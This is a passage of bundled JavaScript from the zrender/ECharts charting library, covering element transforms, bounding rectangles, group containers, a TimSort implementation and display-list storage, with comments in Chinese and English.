= this.transform = [1, 0, 0, 1, 0, 0];\n        }\n        m[4] += dx;\n        m[5] += dy;\n\n        this.decomposeTransform();\n        this.dirty(false);\n    },\n\n    /**\n     * Hook before update\n     */\n    beforeUpdate: function () {},\n    /**\n     * Hook after update\n     */\n    afterUpdate: function () {},\n    /**\n     * Update each frame\n     */\n    update: function () {\n        this.updateTransform();\n    },\n\n    /**\n     * @param  {Function} cb\n     * @param  {}   context\n     */\n    traverse: function (cb, context) {},\n\n    /**\n     * @protected\n     */\n    attrKV: function (key, value) {\n        if (key === 'position' || key === 'scale' || key === 'origin') {\n            // Copy the array\n            if (value) {\n                var target = this[key];\n                if (!target) {\n                    target = this[key] = [];\n                }\n                target[0] = value[0];\n                target[1] = value[1];\n            }\n        }\n        else {\n            this[key] = value;\n        }\n    },\n\n    /**\n     * Hide the element\n     */\n    hide: function () {\n        this.ignore = true;\n        this.__zr && this.__zr.refresh();\n    },\n\n    /**\n     * Show the element\n     */\n    show: function () {\n        this.ignore = false;\n        this.__zr && this.__zr.refresh();\n    },\n\n    /**\n     * @param {string|Object} key\n     * @param {*} value\n     */\n    attr: function (key, value) {\n        if (typeof key === 'string') {\n            this.attrKV(key, value);\n        }\n        else if (isObject$1(key)) {\n            for (var name in key) {\n                if (key.hasOwnProperty(name)) {\n                    this.attrKV(name, key[name]);\n                }\n            }\n        }\n\n        this.dirty(false);\n\n        return this;\n    },\n\n    /**\n     * @param {module:zrender/graphic/Path} clipPath\n     */\n    setClipPath: function (clipPath) {\n        var zr = this.__zr;\n        if (zr) {\n            clipPath.addSelfToZr(zr);\n        }\n\n        // Remove previous clip path\n        if (this.clipPath && this.clipPath !== clipPath) {\n            this.removeClipPath();\n        }\n\n        this.clipPath = clipPath;\n        clipPath.__zr = zr;\n        clipPath.__clipTarget = this;\n\n        this.dirty(false);\n    },\n\n    /**\n     */\n    removeClipPath: function () {\n        var clipPath = this.clipPath;\n        if (clipPath) {\n            if (clipPath.__zr) {\n                clipPath.removeSelfFromZr(clipPath.__zr);\n            }\n\n            clipPath.__zr = null;\n            clipPath.__clipTarget = null;\n            this.clipPath = null;\n\n            this.dirty(false);\n        }\n    },\n\n    /**\n     * Add self from zrender instance.\n     * Not recursively because it will be invoked when element added to storage.\n     * @param {module:zrender/ZRender} zr\n     */\n    addSelfToZr: function (zr) {\n        this.__zr = zr;\n        // 添加动画\n        var animators = this.animators;\n        if (animators) {\n            for (var i = 0; i < animators.length; i++) {\n                zr.animation.addAnimator(animators[i]);\n            }\n        }\n\n        if (this.clipPath) {\n            this.clipPath.addSelfToZr(zr);\n        }\n    },\n\n    /**\n     * Remove self from zrender instance.\n     * Not recursively because it will be invoked when element added to storage.\n     * @param {module:zrender/ZRender} zr\n     */\n    removeSelfFromZr: function (zr) {\n        this.__zr = null;\n        // 移除动画\n        var animators = this.animators;\n        if (animators) {\n            for (var i = 0; i < animators.length; i++) {\n                zr.animation.removeAnimator(animators[i]);\n            }\n        }\n\n        if (this.clipPath) {\n            this.clipPath.removeSelfFromZr(zr);\n        }\n    }\n};\n\nmixin(Element, Animatable);\nmixin(Element, Transformable);\nmixin(Element, Eventful);\n\n/**\n * @module echarts/core/BoundingRect\n */\n\nvar v2ApplyTransform = applyTransform;\nvar mathMin = Math.min;\nvar mathMax = Math.max;\n\n/**\n * @alias module:echarts/core/BoundingRect\n */\nfunction BoundingRect(x, y, width, height) {\n\n    if (width < 0) {\n        x = x + width;\n        width = -width;\n    }\n    if (height < 0) {\n        y = y + height;\n        height = -height;\n    }\n\n    /**\n     * @type {number}\n     */\n    this.x = x;\n    /**\n     * @type {number}\n     */\n    this.y = y;\n    /**\n     * @type {number}\n     */\n    this.width = width;\n    /**\n     * @type {number}\n     */\n    this.height = height;\n}\n\nBoundingRect.prototype = {\n\n    constructor: BoundingRect,\n\n    /**\n     * @param {module:echarts/core/BoundingRect} other\n     */\n    union: function (other) {\n        var x = mathMin(other.x, this.x);\n        var y = mathMin(other.y, this.y);\n\n        this.width = mathMax(\n                other.x + other.width,\n                this.x + this.width\n            ) - x;\n        this.height = mathMax(\n                other.y + other.height,\n                this.y + this.height\n            ) - y;\n        this.x = x;\n        this.y = y;\n    },\n\n    /**\n     * @param {Array.<number>} m\n     * @methods\n     */\n    applyTransform: (function () {\n        var lt = [];\n        var rb = [];\n        var lb = [];\n        var rt = [];\n        return function (m) {\n            // In case usage like this\n            // el.getBoundingRect().applyTransform(el.transform)\n            // And element has no transform\n            if (!m) {\n                return;\n            }\n            lt[0] = lb[0] = this.x;\n            lt[1] = rt[1] = this.y;\n            rb[0] = rt[0] = this.x + this.width;\n            rb[1] = lb[1] = this.y + this.height;\n\n            v2ApplyTransform(lt, lt, m);\n            v2ApplyTransform(rb, rb, m);\n            v2ApplyTransform(lb, lb, m);\n            v2ApplyTransform(rt, rt, m);\n\n            this.x = mathMin(lt[0], rb[0], lb[0], rt[0]);\n            this.y = mathMin(lt[1], rb[1], lb[1], rt[1]);\n            var maxX = mathMax(lt[0], rb[0], lb[0], rt[0]);\n            var maxY = mathMax(lt[1], rb[1], lb[1], rt[1]);\n            this.width = maxX - this.x;\n            this.height = maxY - this.y;\n        };\n    })(),\n\n    /**\n     * Calculate matrix of transforming from self to target rect\n     * @param  {module:zrender/core/BoundingRect} b\n     * @return {Array.<number>}\n     */\n    calculateTransform: function (b) {\n        var a = this;\n        var sx = b.width / a.width;\n        var sy = b.height / a.height;\n\n        var m = create$1();\n\n        // 矩阵右乘\n        translate(m, m, [-a.x, -a.y]);\n        scale$1(m, m, [sx, sy]);\n        translate(m, m, [b.x, b.y]);\n\n        return m;\n    },\n\n    /**\n     * @param {(module:echarts/core/BoundingRect|Object)} b\n     * @return {boolean}\n     */\n    intersect: function (b) {\n        if (!b) {\n            return false;\n        }\n\n        if (!(b instanceof BoundingRect)) {\n            // Normalize negative width/height.\n            b = BoundingRect.create(b);\n        }\n\n        var a = this;\n        var ax0 = a.x;\n        var ax1 = a.x + a.width;\n        var ay0 = a.y;\n        var ay1 = a.y + a.height;\n\n        var bx0 = b.x;\n        var bx1 = b.x + b.width;\n        var by0 = b.y;\n        var by1 = b.y + b.height;\n\n        return !(ax1 < bx0 || bx1 < ax0 || ay1 < by0 || by1 < ay0);\n    },\n\n    contain: function (x, y) {\n        var rect = this;\n        return x >= rect.x\n            && x <= (rect.x + rect.width)\n            && y >= rect.y\n            && y <= (rect.y + rect.height);\n    },\n\n    /**\n     * @return {module:echarts/core/BoundingRect}\n     */\n    clone: function () {\n        return new BoundingRect(this.x, this.y, this.width, this.height);\n    },\n\n    /**\n     * Copy from another rect\n     */\n    copy: function (other) {\n        this.x = other.x;\n        this.y = other.y;\n        this.width = other.width;\n        this.height = other.height;\n    },\n\n    plain: function () {\n        return {\n            x: this.x,\n            y: this.y,\n            width: this.width,\n            height: this.height\n        };\n    }\n};\n\n/**\n * @param {Object|module:zrender/core/BoundingRect} rect\n * @param {number} rect.x\n * @param {number} rect.y\n * @param {number} rect.width\n * @param {number} rect.height\n * @return {module:zrender/core/BoundingRect}\n */\nBoundingRect.create = function (rect) {\n    return new BoundingRect(rect.x, rect.y, rect.width, rect.height);\n};\n\n/**\n * Group是一个容器，可以插入子节点，Group的变换也会被应用到子节点上\n * @module zrender/graphic/Group\n * @example\n *     var Group = require('zrender/container/Group');\n *     var Circle = require('zrender/graphic/shape/Circle');\n *     var g = new Group();\n *     g.position[0] = 100;\n *     g.position[1] = 100;\n *     g.add(new Circle({\n *         style: {\n *             x: 100,\n *             y: 100,\n *             r: 20,\n *         }\n *     }));\n *     zr.add(g);\n */\n\n/**\n * @alias module:zrender/graphic/Group\n * @constructor\n * @extends module:zrender/mixin/Transformable\n * @extends module:zrender/mixin/Eventful\n */\nvar Group = function (opts) {\n\n    opts = opts || {};\n\n    Element.call(this, opts);\n\n    for (var key in opts) {\n        if (opts.hasOwnProperty(key)) {\n            this[key] = opts[key];\n        }\n    }\n\n    this._children = [];\n\n    this.__storage = null;\n\n    this.__dirty = true;\n};\n\nGroup.prototype = {\n\n    constructor: Group,\n\n    isGroup: true,\n\n    /**\n     * @type {string}\n     */\n    type: 'group',\n\n    /**\n     * 所有子孙元素是否响应鼠标事件\n     * @name module:/zrender/container/Group#silent\n     * @type {boolean}\n     * @default false\n     */\n    silent: false,\n\n    /**\n     * @return {Array.<module:zrender/Element>}\n     */\n    children: function () {\n        return this._children.slice();\n    },\n\n    /**\n     * 获取指定 index 的儿子节点\n     * @param  {number} idx\n     * @return {module:zrender/Element}\n     */\n    childAt: function (idx) {\n        return this._children[idx];\n    },\n\n    /**\n     * 获取指定名字的儿子节点\n     * @param  {string} name\n     * @return {module:zrender/Element}\n     */\n    childOfName: function (name) {\n        var children = this._children;\n        for (var i = 0; i < children.length; i++) {\n            if (children[i].name === name) {\n                return children[i];\n            }\n            }\n    },\n\n    /**\n     * @return {number}\n     */\n    childCount: function () {\n        return this._children.length;\n    },\n\n    /**\n     * 添加子节点到最后\n     * @param {module:zrender/Element} child\n     */\n    add: function (child) {\n        if (child && child !== this && child.parent !== this) {\n\n            this._children.push(child);\n\n            this._doAdd(child);\n        }\n\n        return this;\n    },\n\n    /**\n     * 添加子节点在 nextSibling 之前\n     * @param {module:zrender/Element} child\n     * @param {module:zrender/Element} nextSibling\n     */\n    addBefore: function (child, nextSibling) {\n        if (child && child !== this && child.parent !== this\n            && nextSibling && nextSibling.parent === this) {\n\n            var children = this._children;\n            var idx = children.indexOf(nextSibling);\n\n            if (idx >= 0) {\n                children.splice(idx, 0, child);\n                this._doAdd(child);\n            }\n        }\n\n        return this;\n    },\n\n    _doAdd: function (child) {\n        if (child.parent) {\n            child.parent.remove(child);\n        }\n\n        child.parent = this;\n\n        var storage = this.__storage;\n        var zr = this.__zr;\n        if (storage && storage !== child.__storage) {\n\n            storage.addToStorage(child);\n\n            if (child instanceof Group) {\n                child.addChildrenToStorage(storage);\n            }\n        }\n\n        zr && zr.refresh();\n    },\n\n    /**\n     * 移除子节点\n     * @param {module:zrender/Element} child\n     */\n    remove: function (child) {\n        var zr = this.__zr;\n        var storage = this.__storage;\n        var children = this._children;\n\n        var idx = indexOf(children, child);\n        if (idx < 0) {\n            return this;\n        }\n        children.splice(idx, 1);\n\n        child.parent = null;\n\n        if (storage) {\n\n            storage.delFromStorage(child);\n\n            if (child instanceof Group) {\n                child.delChildrenFromStorage(storage);\n            }\n        }\n\n        zr && zr.refresh();\n\n        return this;\n    },\n\n    /**\n     * 移除所有子节点\n     */\n    removeAll: function () {\n        var children = this._children;\n        var storage = this.__storage;\n        var child;\n        var i;\n        for (i = 0; i < children.length; i++) {\n            child = children[i];\n            if (storage) {\n                storage.delFromStorage(child);\n                if (child instanceof Group) {\n                    child.delChildrenFromStorage(storage);\n                }\n            }\n            child.parent = null;\n        }\n        children.length = 0;\n\n        return this;\n    },\n\n    /**\n     * 遍历所有子节点\n     * @param  {Function} cb\n     * @param  {}   context\n     */\n    eachChild: function (cb, context) {\n        var children = this._children;\n        for (var i = 0; i < children.length; i++) {\n            var child = children[i];\n            cb.call(context, child, i);\n        }\n        return this;\n    },\n\n    /**\n     * 深度优先遍历所有子孙节点\n     * @param  {Function} cb\n     * @param  {}   context\n     */\n    traverse: function (cb, context) {\n        for (var i = 0; i < this._children.length; i++) {\n            var child = this._children[i];\n            cb.call(context, child);\n\n            if (child.type === 'group') {\n                child.traverse(cb, context);\n            }\n        }\n        return this;\n    },\n\n    addChildrenToStorage: function (storage) {\n        for (var i = 0; i < this._children.length; i++) {\n            var child = this._children[i];\n            storage.addToStorage(child);\n            if (child instanceof Group) {\n                child.addChildrenToStorage(storage);\n            }\n        }\n    },\n\n    delChildrenFromStorage: function (storage) {\n        for (var i = 0; i < this._children.length; i++) {\n            var child = this._children[i];\n            storage.delFromStorage(child);\n            if (child instanceof Group) {\n                child.delChildrenFromStorage(storage);\n            }\n        }\n    },\n\n    dirty: function () {\n        this.__dirty = true;\n        this.__zr && this.__zr.refresh();\n        return this;\n    },\n\n    /**\n     * @return {module:zrender/core/BoundingRect}\n     */\n    getBoundingRect: function (includeChildren) {\n        // TODO Caching\n        var rect = null;\n        var tmpRect = new BoundingRect(0, 0, 0, 0);\n        var children = includeChildren || this._children;\n        var tmpMat = [];\n\n        for (var i = 0; i < children.length; i++) {\n            var child = children[i];\n            if (child.ignore || child.invisible) {\n                continue;\n            }\n\n            var childRect = child.getBoundingRect();\n            var transform = child.getLocalTransform(tmpMat);\n            // TODO\n            // The boundingRect cacluated by transforming original\n            // rect may be bigger than the actual bundingRect when rotation\n            // is used. (Consider a circle rotated aginst its center, where\n            // the actual boundingRect should be the same as that not be\n            // rotated.) But we can not find better approach to calculate\n            // actual boundingRect yet, considering performance.\n            if (transform) {\n                tmpRect.copy(childRect);\n                tmpRect.applyTransform(transform);\n                rect = rect || tmpRect.clone();\n                rect.union(tmpRect);\n            }\n            else {\n                rect = rect || childRect.clone();\n                rect.union(childRect);\n            }\n        }\n        return rect || tmpRect;\n    }\n};\n\ninherits(Group, Element);\n\n// https://github.com/mziccard/node-timsort\nvar DEFAULT_MIN_MERGE = 32;\n\nvar DEFAULT_MIN_GALLOPING = 7;\n\nfunction minRunLength(n) {\n    var r = 0;\n\n    while (n >= DEFAULT_MIN_MERGE) {\n        r |= n & 1;\n        n >>= 1;\n    }\n\n    return n + r;\n}\n\nfunction makeAscendingRun(array, lo, hi, compare) {\n    var runHi = lo + 1;\n\n    if (runHi === hi) {\n        return 1;\n    }\n\n    if (compare(array[runHi++], array[lo]) < 0) {\n        while (runHi < hi && compare(array[runHi], array[runHi - 1]) < 0) {\n            runHi++;\n        }\n\n        reverseRun(array, lo, runHi);\n    }\n    else {\n        while (runHi < hi && compare(array[runHi], array[runHi - 1]) >= 0) {\n            runHi++;\n        }\n    }\n\n    return runHi - lo;\n}\n\nfunction reverseRun(array, lo, hi) {\n    hi--;\n\n    while (lo < hi) {\n        var t = array[lo];\n        array[lo++] = array[hi];\n        array[hi--] = t;\n    }\n}\n\nfunction binaryInsertionSort(array, lo, hi, start, compare) {\n    if (start === lo) {\n        start++;\n    }\n\n    for (; start < hi; start++) {\n        var pivot = array[start];\n\n        var left = lo;\n        var right = start;\n        var mid;\n\n        while (left < right) {\n            mid = left + right >>> 1;\n\n            if (compare(pivot, array[mid]) < 0) {\n                right = mid;\n            }\n            else {\n                left = mid + 1;\n            }\n        }\n\n        var n = start - left;\n\n        switch (n) {\n            case 3:\n                array[left + 3] = array[left + 2];\n\n            case 2:\n                array[left + 2] = array[left + 1];\n\n            case 1:\n                array[left + 1] = array[left];\n                break;\n            default:\n                while (n > 0) {\n                    array[left + n] = array[left + n - 1];\n                    n--;\n                }\n        }\n\n        array[left] = pivot;\n    }\n}\n\nfunction gallopLeft(value, array, start, length, hint, compare) {\n    var lastOffset = 0;\n    var maxOffset = 0;\n    var offset = 1;\n\n    if (compare(value, array[start + hint]) > 0) {\n        maxOffset = length - hint;\n\n        while (offset < maxOffset && compare(value, array[start + hint + offset]) > 0) {\n            lastOffset = offset;\n            offset = (offset << 1) + 1;\n\n            if (offset <= 0) {\n                offset = maxOffset;\n            }\n        }\n\n        if (offset > maxOffset) {\n            offset = maxOffset;\n        }\n\n        lastOffset += hint;\n        offset += hint;\n    }\n    else {\n        maxOffset = hint + 1;\n        while (offset < maxOffset && compare(value, array[start + hint - offset]) <= 0) {\n            lastOffset = offset;\n            offset = (offset << 1) + 1;\n\n            if (offset <= 0) {\n                offset = maxOffset;\n            }\n        }\n        if (offset > maxOffset) {\n            offset = maxOffset;\n        }\n\n        var tmp = lastOffset;\n        lastOffset = hint - offset;\n        offset = hint - tmp;\n    }\n\n    lastOffset++;\n    while (lastOffset < offset) {\n        var m = lastOffset + (offset - lastOffset >>> 1);\n\n        if (compare(value, array[start + m]) > 0) {\n            lastOffset = m + 1;\n        }\n        else {\n            offset = m;\n        }\n    }\n    return offset;\n}\n\nfunction gallopRight(value, array, start, length, hint, compare) {\n    var lastOffset = 0;\n    var maxOffset = 0;\n    var offset = 1;\n\n    if (compare(value, array[start + hint]) < 0) {\n        maxOffset = hint + 1;\n\n        while (offset < maxOffset && compare(value, array[start + hint - offset]) < 0) {\n            lastOffset = offset;\n            offset = (offset << 1) + 1;\n\n            if (offset <= 0) {\n                offset = maxOffset;\n            }\n        }\n\n        if (offset > maxOffset) {\n            offset = maxOffset;\n        }\n\n        var tmp = lastOffset;\n        lastOffset = hint - offset;\n        offset = hint - tmp;\n    }\n    else {\n        maxOffset = length - hint;\n\n        while (offset < maxOffset && compare(value, array[start + hint + offset]) >= 0) {\n            lastOffset = offset;\n            offset = (offset << 1) + 1;\n\n            if (offset <= 0) {\n                offset = maxOffset;\n            }\n        }\n\n        if (offset > maxOffset) {\n            offset = maxOffset;\n        }\n\n        lastOffset += hint;\n        offset += hint;\n    }\n\n    lastOffset++;\n\n    while (lastOffset < offset) {\n        var m = lastOffset + (offset - lastOffset >>> 1);\n\n        if (compare(value, array[start + m]) < 0) {\n            offset = m;\n        }\n        else {\n            lastOffset = m + 1;\n        }\n    }\n\n    return offset;\n}\n\nfunction TimSort(array, compare) {\n    var minGallop = DEFAULT_MIN_GALLOPING;\n    var runStart;\n    var runLength;\n    var stackSize = 0;\n\n    var tmp = [];\n\n    runStart = [];\n    runLength = [];\n\n    function pushRun(_runStart, _runLength) {\n        runStart[stackSize] = _runStart;\n        runLength[stackSize] = _runLength;\n        stackSize += 1;\n    }\n\n    function mergeRuns() {\n        while (stackSize > 1) {\n            var n = stackSize - 2;\n\n            if (\n                (n >= 1 && runLength[n - 1] <= runLength[n] + runLength[n + 1])\n                || (n >= 2 && runLength[n - 2] <= runLength[n] + runLength[n - 1])\n            ) {\n                if (runLength[n - 1] < runLength[n + 1]) {\n                    n--;\n                }\n            }\n            else if (runLength[n] > runLength[n + 1]) {\n                break;\n            }\n            mergeAt(n);\n        }\n    }\n\n    function forceMergeRuns() {\n        while (stackSize > 1) {\n            var n = stackSize - 2;\n\n            if (n > 0 && runLength[n - 1] < runLength[n + 1]) {\n                n--;\n            }\n\n            mergeAt(n);\n        }\n    }\n\n    function mergeAt(i) {\n        var start1 = runStart[i];\n        var length1 = runLength[i];\n        var start2 = runStart[i + 1];\n        var length2 = runLength[i + 1];\n\n        runLength[i] = length1 + length2;\n\n        if (i === stackSize - 3) {\n            runStart[i + 1] = runStart[i + 2];\n            runLength[i + 1] = runLength[i + 2];\n        }\n\n        stackSize--;\n\n        var k = gallopRight(array[start2], array, start1, length1, 0, compare);\n        start1 += k;\n        length1 -= k;\n\n        if (length1 === 0) {\n            return;\n        }\n\n        length2 = gallopLeft(array[start1 + length1 - 1], array, start2, length2, length2 - 1, compare);\n\n        if (length2 === 0) {\n            return;\n        }\n\n        if (length1 <= length2) {\n            mergeLow(start1, length1, start2, length2);\n        }\n        else {\n            mergeHigh(start1, length1, start2, length2);\n        }\n    }\n\n    function mergeLow(start1, length1, start2, length2) {\n        var i = 0;\n\n        for (i = 0; i < length1; i++) {\n            tmp[i] = array[start1 + i];\n        }\n\n        var cursor1 = 0;\n        var cursor2 = start2;\n        var dest = start1;\n\n        array[dest++] = array[cursor2++];\n\n        if (--length2 === 0) {\n            for (i = 0; i < length1; i++) {\n                array[dest + i] = tmp[cursor1 + i];\n            }\n            return;\n        }\n\n        if (length1 === 1) {\n            for (i = 0; i < length2; i++) {\n                array[dest + i] = array[cursor2 + i];\n            }\n            array[dest + length2] = tmp[cursor1];\n            return;\n        }\n\n        var _minGallop = minGallop;\n        var count1;\n        var count2;\n        var exit;\n\n        while (1) {\n            count1 = 0;\n            count2 = 0;\n            exit = false;\n\n            do {\n                if (compare(array[cursor2], tmp[cursor1]) < 0) {\n                    array[dest++] = array[cursor2++];\n                    count2++;\n                    count1 = 0;\n\n                    if (--length2 === 0) {\n                        exit = true;\n                        break;\n                    }\n                }\n                else {\n                    array[dest++] = tmp[cursor1++];\n                    count1++;\n                    count2 = 0;\n                    if (--length1 === 1) {\n                        exit = true;\n                        break;\n                    }\n                }\n            } while ((count1 | count2) < _minGallop);\n\n            if (exit) {\n                break;\n            }\n\n            do {\n                count1 = gallopRight(array[cursor2], tmp, cursor1, length1, 0, compare);\n\n                if (count1 !== 0) {\n                    for (i = 0; i < count1; i++) {\n                        array[dest + i] = tmp[cursor1 + i];\n                    }\n\n                    dest += count1;\n                    cursor1 += count1;\n                    length1 -= count1;\n                    if (length1 <= 1) {\n                        exit = true;\n                        break;\n                    }\n                }\n\n                array[dest++] = array[cursor2++];\n\n                if (--length2 === 0) {\n                    exit = true;\n                    break;\n                }\n\n                count2 = gallopLeft(tmp[cursor1], array, cursor2, length2, 0, compare);\n\n                if (count2 !== 0) {\n                    for (i = 0; i < count2; i++) {\n                        array[dest + i] = array[cursor2 + i];\n                    }\n\n                    dest += count2;\n                    cursor2 += count2;\n                    length2 -= count2;\n\n                    if (length2 === 0) {\n                        exit = true;\n                        break;\n                    }\n                }\n                array[dest++] = tmp[cursor1++];\n\n                if (--length1 === 1) {\n                    exit = true;\n                    break;\n                }\n\n                _minGallop--;\n            } while (count1 >= DEFAULT_MIN_GALLOPING || count2 >= DEFAULT_MIN_GALLOPING);\n\n            if (exit) {\n                break;\n            }\n\n            if (_minGallop < 0) {\n                _minGallop = 0;\n            }\n\n            _minGallop += 2;\n        }\n\n        minGallop = _minGallop;\n\n        minGallop < 1 && (minGallop = 1);\n\n        if (length1 === 1) {\n            for (i = 0; i < length2; i++) {\n                array[dest + i] = array[cursor2 + i];\n            }\n            array[dest + length2] = tmp[cursor1];\n        }\n        else if (length1 === 0) {\n            throw new Error();\n            // throw new Error('mergeLow preconditions were not respected');\n        }\n        else {\n            for (i = 0; i < length1; i++) {\n                array[dest + i] = tmp[cursor1 + i];\n            }\n        }\n    }\n\n    function mergeHigh(start1, length1, start2, length2) {\n        var i = 0;\n\n        for (i = 0; i < length2; i++) {\n            tmp[i] = array[start2 + i];\n        }\n\n        var cursor1 = start1 + length1 - 1;\n        var cursor2 = length2 - 1;\n        var dest = start2 + length2 - 1;\n        var customCursor = 0;\n        var customDest = 0;\n\n        array[dest--] = array[cursor1--];\n\n        if (--length1 === 0) {\n            customCursor = dest - (length2 - 1);\n\n            for (i = 0; i < length2; i++) {\n                array[customCursor + i] = tmp[i];\n            }\n\n            return;\n        }\n\n        if (length2 === 1) {\n            dest -= length1;\n            cursor1 -= length1;\n            customDest = dest + 1;\n            customCursor = cursor1 + 1;\n\n            for (i = length1 - 1; i >= 0; i--) {\n                array[customDest + i] = array[customCursor + i];\n            }\n\n            array[dest] = tmp[cursor2];\n            return;\n        }\n\n        var _minGallop = minGallop;\n\n        while (true) {\n            var count1 = 0;\n            var count2 = 0;\n            var exit = false;\n\n            do {\n                if (compare(tmp[cursor2], array[cursor1]) < 0) {\n                    array[dest--] = array[cursor1--];\n                    count1++;\n                    count2 = 0;\n                    if (--length1 === 0) {\n                        exit = true;\n                        break;\n                    }\n                }\n                else {\n                    array[dest--] = tmp[cursor2--];\n                    count2++;\n                    count1 = 0;\n                    if (--length2 === 1) {\n                        exit = true;\n                        break;\n                    }\n                }\n            } while ((count1 | count2) < _minGallop);\n\n            if (exit) {\n                break;\n            }\n\n            do {\n                count1 = length1 - gallopRight(tmp[cursor2], array, start1, length1, length1 - 1, compare);\n\n                if (count1 !== 0) {\n                    dest -= count1;\n                    cursor1 -= count1;\n                    length1 -= count1;\n                    customDest = dest + 1;\n                    customCursor = cursor1 + 1;\n\n                    for (i = count1 - 1; i >= 0; i--) {\n                        array[customDest + i] = array[customCursor + i];\n                    }\n\n                    if (length1 === 0) {\n                        exit = true;\n                        break;\n                    }\n                }\n\n                array[dest--] = tmp[cursor2--];\n\n                if (--length2 === 1) {\n                    exit = true;\n                    break;\n                }\n\n                count2 = length2 - gallopLeft(array[cursor1], tmp, 0, length2, length2 - 1, compare);\n\n                if (count2 !== 0) {\n                    dest -= count2;\n                    cursor2 -= count2;\n                    length2 -= count2;\n                    customDest = dest + 1;\n                    customCursor = cursor2 + 1;\n\n                    for (i = 0; i < count2; i++) {\n                        array[customDest + i] = tmp[customCursor + i];\n                    }\n\n                    if (length2 <= 1) {\n                        exit = true;\n                        break;\n                    }\n                }\n\n                array[dest--] = array[cursor1--];\n\n                if (--length1 === 0) {\n                    exit = true;\n                    break;\n                }\n\n                _minGallop--;\n            } while (count1 >= DEFAULT_MIN_GALLOPING || count2 >= DEFAULT_MIN_GALLOPING);\n\n            if (exit) {\n                break;\n            }\n\n            if (_minGallop < 0) {\n                _minGallop = 0;\n            }\n\n            _minGallop += 2;\n        }\n\n        minGallop = _minGallop;\n\n        if (minGallop < 1) {\n            minGallop = 1;\n        }\n\n        if (length2 === 1) {\n            dest -= length1;\n            cursor1 -= length1;\n            customDest = dest + 1;\n            customCursor = cursor1 + 1;\n\n            for (i = length1 - 1; i >= 0; i--) {\n                array[customDest + i] = array[customCursor + i];\n            }\n\n            array[dest] = tmp[cursor2];\n        }\n        else if (length2 === 0) {\n            throw new Error();\n            // throw new Error('mergeHigh preconditions were not respected');\n        }\n        else {\n            customCursor = dest - (length2 - 1);\n            for (i = 0; i < length2; i++) {\n                array[customCursor + i] = tmp[i];\n            }\n        }\n    }\n\n    this.mergeRuns = mergeRuns;\n    this.forceMergeRuns = forceMergeRuns;\n    this.pushRun = pushRun;\n}\n\nfunction sort(array, compare, lo, hi) {\n    if (!lo) {\n        lo = 0;\n    }\n    if (!hi) {\n        hi = array.length;\n    }\n\n    var remaining = hi - lo;\n\n    if (remaining < 2) {\n        return;\n    }\n\n    var runLength = 0;\n\n    if (remaining < DEFAULT_MIN_MERGE) {\n        runLength = makeAscendingRun(array, lo, hi, compare);\n        binaryInsertionSort(array, lo, hi, lo + runLength, compare);\n        return;\n    }\n\n    var ts = new TimSort(array, compare);\n\n    var minRun = minRunLength(remaining);\n\n    do {\n        runLength = makeAscendingRun(array, lo, hi, compare);\n        if (runLength < minRun) {\n            var force = remaining;\n            if (force > minRun) {\n                force = minRun;\n            }\n\n            binaryInsertionSort(array, lo, lo + force, lo + runLength, compare);\n            runLength = force;\n        }\n\n        ts.pushRun(lo, runLength);\n        ts.mergeRuns();\n\n        remaining -= runLength;\n        lo += runLength;\n    } while (remaining !== 0);\n\n    ts.forceMergeRuns();\n}\n\n// Use timsort because in most case elements are partially sorted\n// https://jsfiddle.net/pissang/jr4x7mdm/8/\nfunction shapeCompareFunc(a, b) {\n    if (a.zlevel === b.zlevel) {\n        if (a.z === b.z) {\n            // if (a.z2 === b.z2) {\n            //     // FIXME Slow has renderidx compare\n            //     // http://stackoverflow.com/questions/20883421/sorting-in-javascript-should-every-compare-function-have-a-return-0-statement\n            //     // https://github.com/v8/v8/blob/47cce544a31ed5577ffe2963f67acb4144ee0232/src/js/array.js#L1012\n            //     return a.__renderidx - b.__renderidx;\n            // }\n            return a.z2 - b.z2;\n        }\n        return a.z - b.z;\n    }\n    return a.zlevel - b.zlevel;\n}\n/**\n * 内容仓库 (M)\n * @alias module:zrender/Storage\n * @constructor\n */\nvar Storage = function () { // jshint ignore:line\n    this._roots = [];\n\n    this._displayList = [];\n\n    this._displayListLen = 0;\n};\n\nStorage.prototype = {\n\n    constructor: Storage,\n\n    /**\n     * @param  {Function} cb\n     *\n     */\n    traverse: function (cb, context) {\n        for (var i = 0; i < this._roots.length; i++) {\n            this._roots[i].traverse(cb, context);\n        }\n    },\n\n    /**\n     * 返回所有图形的绘制队列\n     * @param {boolean} [update=false] 是否在返回前更新该数组\n     * @param {boolean} [includeIgnore=false] 是否包含 ignore 的数组, 在 update 为 true 的时候有效\n     *\n     * 详见{@link module:zrender/graphic/Displayable.prototype.updateDisplayList}\n     * @return {Array.<module:zrender/graphic/Displayable>}\n     */\n    getDisplayList: function (update, includeIgnore) {\n        includeIgnore = includeIgnore || false;\n        if (update) {\n            this.updateDisplayList(includeIgnore);\n        }\n        return this._displayList;\n    },\n\n    /**\n     * 更新图形的绘制队列。\n     * 每次绘制前都会调用，该方法会先深度优先遍历整个树，更新所有Group和Shape的变换并且把所有可见的Shape保存到数组中，\n     * 最后根据绘制的优先级（zlevel > z > 插入顺序）排序得到绘制队列\n     * @param {boolean} [includeIgnore=false] 是否包含 ignore 的数组\n     */\n    updateDisplayList: function (includeIgnore) {\n        this._displayListLen = 0;\n\n        var roots = this._roots;\n        var displayList = this._displayList;\n        for (var i = 0, len = roots.length; i < len; i++) {\n            this._updateAndAddDisplayable(roots[i], null, includeIgnore);\n        }\n\n        displayList.length = this._displayListLen;\n\n        env$1.canvasSupported && sort(displayList, shapeCompareFunc);\n    },\n\n    _updateAndAddDisplayable: function (el, clipPaths, includeIgnore) {\n\n        if (el.ignore && !includeIgnore) {\n            return;\n        }\n\n        el.beforeUpdate();\n\n        if (el.__dirty) {\n\n            el.update();\n\n        }\n\n        el.afterUpdate();\n\n        var userSetClipPath = el.clipPath;\n        if (userSetClipPath) {\n\n            // FIXME 效率影响\n            if (clipPaths) {\n                clipPaths = clipPaths.slice();\n            }\n            else {\n                clipPaths = [];\n            }\n\n            var currentClipPath = userSetClipPath;\n            var parentClipPath = el;\n            // Recursively add clip path\n            while (currentClipPath) {\n                // clipPath 的变换是基于使用这个 clipPath 的元素\n                currentClipPath.parent = parentClipPath;\n                currentClipPath.updateTransform();\n\n                clipPaths.push(currentClipPath);\n\n                parentClipPath = currentClipPath;\n                currentClipPath = currentClipPath.clipPath;\n            }\n        }\n\n        if (el.isGroup) {\n            var children = el._children;\n\n            for (var i = 0; i < children.length; i++) {\n                var child = children[i];\n\n                // Force to mark as dirty if group is dirty\n                // FIXME __dirtyPath ?\n                if (el.__dirty) {\n                    child.__dirty = true;\n                }\n\n                this._updateAndAddDisplayable(child, 